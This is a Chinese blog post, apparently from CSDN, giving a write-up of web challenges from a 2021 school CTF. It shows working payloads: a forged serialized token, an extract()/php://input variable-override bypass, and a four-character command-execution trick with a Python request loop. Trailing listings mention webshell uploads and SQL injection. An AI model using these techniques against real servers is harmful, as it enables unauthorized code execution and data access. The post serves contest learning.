ZJPC2021CTF web wp

最新推荐文章于 2024-05-21 17:28:11 发布
最新推荐文章于 2024-05-21 17:28:11 发布
阅读量623 收藏 3
点赞数
分类专栏: CTF 文章标签: web 信息安全 php python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xxxiaojian/article/details/117639523
版权

前言

这次校赛,不晓得自己在赣神魔,脑子有点抽
因为有点事来得晚了,就想着把web做完就行
结果其他简单题一道没看,比如re的burst is a good idea,足足300分啊
然后web还一堆骚操作,麻了
ctf果然还是拿分重要
被pwn狗无情嘲讽
mid2dog亲笔—校赛其他题wp

一、phpinfo

签到题啦,没啥好说的,所有同学都做出来了
打开环境直接拉到最下面就有flag
或者 f12 注释里有 flag
再或者 Ctrl + f 搜索 flag

二、ez反序列化

先上源码

<?php
show_source(__FILE__); 
include("flag.php");
session_start();
$requset = array_merge($_GET, $_POST, $_SESSION,$_COOKIE);
if(isset($requset['token'])){  
    $login = unserialize(gzuncompress(base64_decode($requset['token'])));
    if($login['user'] === 'ZJPCTF')
    {
        echo $flag;
    }
}
?>

代码审计一下,显然是要构造反序列化来得到flag

鉴于都是小萌新,我就解释的稍微详细那么一丢丢

首先文件包含一个flag.php,显然flag就在flag.php里

接着通过get,post,session,cookie四种传参方式对request进行赋值

对request进行base64解密、gz解压缩、反序列化后赋值给login

最后判断login中user键对应的值是ZJPCTF就可以成功get flag啦!

解密思路很清晰,那么直接倒着加密一遍然后传参就行

<?php
$token = array("user"=>"ZJPCTF");
echo base64_encode(gzcompress(serialize($token)));
?>
# eJxLtDK0qi62MrFSKi1OLVKyLrYys1KK8gpwDnFTsq4FAIn4CMU=

所以最后payload:
/?token=eJxLtDK0qi62MrFSKi1OLVKyLrYys1KK8gpwDnFTsq4FAIn4CMU=

三、ssjh

这道题,真是一言难尽。。。
当时有事来晚了,时间不太够,这道题都没出 (主要是没搜到原题QAQ
上源码

<?php
show_source(__FILE__); 
include("flag.php");
$flag='flag{xxx}'; 
extract($_GET);
if(isset($payload))
{
	$content=trim(file_get_contents($flag));
	if($payload==$content && $payload=='ssjh')
	{
		echo $flag1;
	}
	else
	{
		echo'try again';
	}
}
?>

源码审计一下,这道题的考点在于 extract() 函数的变量覆盖漏洞

extract()
数组中将变量导入到当前的符号表

$_GET
通过 URL 参数(又叫 query string)传递给当前脚本的变量的数组。 注意:该数组不仅仅对 method 为 GET 的请求生效,而是会针对所有带 query string 的请求

这个漏洞挺可怕的,若是被黑客发现,而且有可控参数,也许就能造成意想不到的破坏,比如这题

if($payload==$content && $payload=='ssjh')

最终要构造的绕过点就在这里,乍一看好像挺简单的,只要payload和content相等并且payload=='ssjh’就行了
那我们直接传参/?payload=ssjh&content=ssjh不就好了???

当然不是,可以看到content是在extract($_GET)之后才给赋值的

$content=trim(file_get_contents($flag));

所以我们应该对$flag进行操作,那么问题又来了

file_get_contents()
将整个文件读入一个字符串

我怎么知道有什么文件,而且哪个文件里面内容是’ssjh’???

那显然,这道题肯定不是这么解的,后来给了hint:php伪协议
当时就很奇怪,伪协议能干哈,难不成远程写一个文件上去,内容是ssjh,然后再访问?大概试了一下,没有执行权限。时间不够,就这样无了

赛后问师兄,发现了新大陆

file_get_contents(“php://input”)的用法
https://www.cnblogs.com/lxwphp/p/11316144.html

所以最后payload:
/?payload=ssjh&flag=php://input
post : “ssjh”

我是菜狗,我自己爬

四、4字exec

这道题,做过了。。。当时没想起来 麻中麻

给了?cmd,那显然是rce

什么是RCE?
远程连接命令/代码执行漏洞,简称RCE漏洞,能够让攻击者直接向后台服务器远程写入服务器系统命令或者代码,从而控制后台系统。

这题当然不需要挖漏洞,直接传参就行,但是传参不能超过4个字符
这就很麻烦啊,毕竟正常来做的话确实很麻烦

我这里贴个师傅总结的帖子,总结的不错,学到了很多
https://blog.csdn.net/q20010619/article/details/109206728

但是赛后师兄就说了两句话

>cat
* /*

Alt
我觉得这个方法可以算非预期
在这里插入图片描述
女少口阿~~

但是鸡贼的17web狗还写了个后台任务,每秒去删除cat文件
所以要自己写python去跑
借鉴上面师傅博客的脚本

import requests
url = "http://***.***.**.**:****/?cmd={0}"
print("[+]start attack!!!")
res = ''
with open("payload.txt","r") as f:
    for i in f:
        print("[*]" + url.format(i.strip()))
        res += requests.get(url.format(i.strip())).text
with open("res.txt","w") as f:
    f.write(res)
print("[+]attack success!!!")

打开保存的res.txt,搜索flag

结语

第一次在csdn写wp,师傅们轻点喷

总的来说,这次校赛是真简单,至于为啥没做出来
因为蔡

哦对,还有一道diff web,这个涉及一些原因,我就先不写了,真有兴趣的师弟可以来找我交流下思路

over
xx_xxiaojian
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BUUCTF题目Web部分wp(持续更新)
苦行僧的妖孽日常
08-10 1146
BUUCTF题目Web部分的writeup(持续更新)
BUUCTF--Web篇详细wp
Aluxian_的博客
04-10 4390
BUUCTF--Web篇详细wp
CTF-web-WP-攻防世界-1
最新发布
x88125E的博客
05-21 1956
web题目WP
ISCTF2023 web方向wp超详细解析+做题思路(部分)
2301_76690905的博客
11-29 3863
题目:提示了一句话密码为1,直接蚁剑连靶场,密码连1进去就能看见flag1根目录有flag2flag3不可能一个个点,肯定是转去虚拟终端用命令找,在开虚拟终端之前看下.sh,一般都会放些提示我们就能知道,FLAG3 包含了 FLAG 变量的从第 21 个字符到末尾的部分,可以直接在虚拟终端输出 FLAG3 变量的值那我们先进入虚拟终端,然后cd /去到根目录,然后在根目录输出FLAG3 变量的值别的命令不知道为什么不是返回不了,就是权限不够,都已经root了(?
[CTF]2022美团CTF WEB WP
Sapphire037的博客
09-18 3548
2022美团CTFWEB方向Write up
BUUCTFweb的一些wp(2)
qq_44371274的博客
12-09 411
是BUUCTFwp
sss.rar_sss、GIF、com_联盟
09-21
它采用ASP(Active Server Pages)编程语言编写,ASP是微软开发的一种服务器端脚本环境,用于创建动态网页或Web应用程序。系统特点是功能强大,支持HTML静态生成,这意味着它可以将动态内容转化为静态HTML页面,有利...
CTF_Web:攻防世界高手区进阶题WP(19-21)
AFCC_的博客(Web_Dog)
09-09 1647
NSCTFweb2题解 打开题目直接是一段代码,提示逆向即为flag,首先看代码: <?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ $_o=strrev($str); // echo $_o; for($_0=0;$_0<strlen($_o);$_0++){
2021第五空间CTF_web_wp
meteox的博客
09-20 2209
web WebFTP 这个开始时有个1.txt直接访问,里面就有包括flag等的各种环境信息,不知道是忘删了还是有师傅导出的、、、 这个程序直接GitHub上可以找到源代码,里面有个php探针,这就可以得到各种信息了 https://github.com/wifeat/WebFTP/blob/master/Readme/mytz.phpphpinfo中可以得到flag http://114.115.185.167:32770/Readme/mytz.php?act=phpinfo pkloveclou
BUUCTF web wp (五)
m0_55854679的博客
07-29 439
[ACTF2020 新生赛]Upload 打开题目链接点击灯泡即可看到隐隐约约的上传文件的框。 上传一个含有一句话木马的php文件 继续上传一个文件内容为一句话木马的jpg文件,发现使用蚁剑连接不成功,于是我们可以在上传jpg文件时使用burp抓包修改文件后缀为phtml 放包后发现页面提示上传的文件的绝对路径,且文件名被修改 使用蚁剑连接时,注意用被修改过的文件名,连接成功后即可得到flag。 [极客大挑战 2019]BabySQL 又是前面熟悉的SQL注入的题目的背景图 首先尝试万能密码登录,发现数据使
WEB入门 bugku web5
qq_42728977的博客
12-18 309
$num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } "=="绕过 php中有两种比较符号 === 会同时比较字符串的值和类型 == 会先将字符串换成相同类型,再作比较,属于弱类型比较 == 对于所有0e开头的都为相等 is_numeric() 判断变量是否为数字或数字字符串 is_numeric() 函数会判断如果是数字和数字字符串则返回 TRUE,否则返回 FALSE,且
UNCTF2021 部分wp.pdf
12-10
unctf2021
[CTF]UNCTF2021 WP
Sapphire037的博客
12-07 1540
WEB fuzz_md5 爆破找前6位为666666的md5的值,然后常规操作即可得到flag import hashlib import re for a in range(1,1000000000): b=hashlib.md5(str(a).encode("utf-8")) c=(b.hexdigest().encode("utf-8")) if c[0:6]==b'666666': print(a) #print(c) babywrite <?php highlight_fil
2021羊城杯CTF wp
abelxu
09-13 2871
1.签到 比较坑的点是《一起来看***》是17,猜了很久才猜出来 28-08-30-07-04-20-02-17-23-01-12-19 得到flag SangFor{d93b7da38d89c19f481e710ef1b3558b} 2.BabyRop 一万年没做pwn了,为了骗点分还是看了一下。 fgets存在栈溢出 没有cannary保护 存在system函数(也可以用func1),存在/cin/sh字符串 所以可以直接getshell。坑点是不能使用/cin/sh和/sh要执行system(“sh
2021 第五空间 ctf wp
qq_45603443的博客
09-23 2990
2021 第五空间 ctf Misc签到alpha10BabyMiCryptoECCReverseuniappPwnbountyhunterCrazyVMWebEasyCleanuppklovecloudPNG图⽚转换器WebFTPyet_another_mysql_injection Misc 签到 flag{welcometo5space} alpha10 分离得到两个图⽚,⼀个jpg⼀个png, 两张图⼀样,想到可能是盲⽔印, https://github.com/chishaxie/BlindWa
2021 长城杯ctf wp
qq_45603443的博客
09-20 4770
2021 长城杯 wpMisc签到你这flag保熟吗Cryptobaby_rsaReverseJust_cmpfunny_jsWebjava_urlez_pythonPwnK1ng_in_h3Ap_IK1ng_in_h3Ap_II Misc 签到 ASCII—16进制—base64 你这flag保熟吗 下载附件,得到两张图⽚和⼀个压缩包,压缩包需要密码 从图⽚可以提取出两个rar 得到⼀个excel和⼀个hint hint中提示base64:(,还有⼀串不知所云的base64 excel中是分开来的单
2021台湾省赛CTF-web-wp
Firebasky的博客
01-19 1123
重复了*CTF,队友做了*CTF的部分web,当时自己没有出呜呜呜,就去做台湾的比赛了。 链接:https://pan.baidu.com/s/1oIXI7Ygt4k9e143kddXOgQ 提取码:u2pl 复制这段内容后打开百度网盘手机App,操作更方便哦 ...
2021 Picoctf pwn部分wp
weixin_46521144的博客
07-18 510
首先说一下,是参考了校内学长的复盘讲解hhh,这也是第一次直接接触在线的ctf而不是靶场。 Gauntlet1 在ida里面看一下。这三道Gauntlet都是一个类型的,漏洞都是一个格式化字符串+栈溢出。 那就很容易直接把shellcraft.sh()写道栈上,因为一开始给打印了背写区域的起始位置并且使可执行的栈,一溢出就会跳转到我们写的shellcraft上面执行。注意中间还要有个格式化字符串的额send,不要忘了,之前卡在这里好久啊。。。 exp from pwn import * context.
2021NSCTF RE WP
weixin_45803474的博客
07-31 622
题目 链接:https://pan.baidu.com/s/1yt4LNXsk6kdfnaVjT4AsNQ 提取码:py32 ViolentScript.apk 做法一 AndroidKiller搜索flag{定位主函数 一般题目字符串中没有flag时 从smali->com中找 apk中original存放的是配置信息,res存放资源文件(图片视频之类),smali存放字节码文件,其中Android和Androidx为安卓库文件,com中存放的是用户自定义的包 查看java源码 package c
2021-6-8:参加CTF校赛的WP
Hammers_12的博客
06-08 1647
一、Sign_in 简单web题 正常思路先看一下源码 按F12 后看到答案 二、签到 简单Misc题 打开以后 看到有问题和文件夹可以选择 直接选到底 直接得到flag 三、简单题 Reverse简单题 直接打开附件 给出附件为getflag.c文件, 可以看出,flag即为FJZ{1jf11dm4hpns9k0wk2s}的解密 char *caesar_f(char * passwd) { int i,j...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值